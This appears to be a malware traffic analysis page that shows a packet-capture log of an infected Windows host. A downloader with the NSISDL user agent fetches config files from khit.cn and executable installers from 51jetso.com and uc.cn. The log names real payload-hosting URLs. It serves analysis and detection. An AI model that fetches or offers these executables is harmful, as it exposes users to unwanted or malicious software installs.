khit.cn Unknown Browser Malware Traffic Analysis PCAP File Download Sample

https://www.virustotal.com/en/file/96fb78cf6f9420bf83e9f3a730237500401a861859189a580455a883f6a0d33f/analysis/1470998826/

2016-10-23 01:19:15.986646 IP 192.168.1.102.58875 > 203.130.61.232.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /359/setup_120.exe HTTP/1.1
GET /359/setup_120.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: xiazai.51jetso.com
Connection: Keep-Alive

2016-10-23 01:19:25.769716 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [P.], seq 0:98, ack 1, win 256, length 98: HTTP: GET /soft/azbconfig.ini HTTP/1.0
GET /soft/azbconfig.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:19:25.817228 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [.], ack 435, win 254, length 0
2016-10-23 01:19:25.833005 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [F.], seq 98, ack 435, win 254, length 0

2016-10-23 01:19:25.910548 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [P.], seq 0:105, ack 1, win 256, length 105: HTTP: GET /soft/kp2configuration.ini HTTP/1.0
GET /soft/kp2configuration.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:19:26.675653 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [.], ack 2921, win 256, length 0
2016-10-23 01:19:26.676876 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [.], ack 4771, win 256, length 0

2016-10-23 01:21:31.849083 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [P.], seq 0:111, ack 1, win 256, length 111: HTTP: GET /pcbrowser/down.php?pid=4725 HTTP/1.0
GET /pcbrowser/down.php?pid=4725 HTTP/1.0
Host: down2.uc.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:21:32.109301 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [.], ack 249, win 255, length 0
2016-10-23 01:21:32.113814 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [F.], seq 111, ack 249, win 255, length 0

2016-10-23 01:21:32.582991 IP 192.168.1.102.58886 > 66.198.178.112.80: Flags [P.], seq 0:144, ack 1, win 256, length 144: HTTP: GET /down/4725/Browser_V5.7.16173.12_r_4725_(Build1610201330).exe HTTP/1.0
GET /down/4725/Browser_V5.7.16173.12_r_4725_(Build1610201330).exe HTTP/1.0
Host: umcdn.uc.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*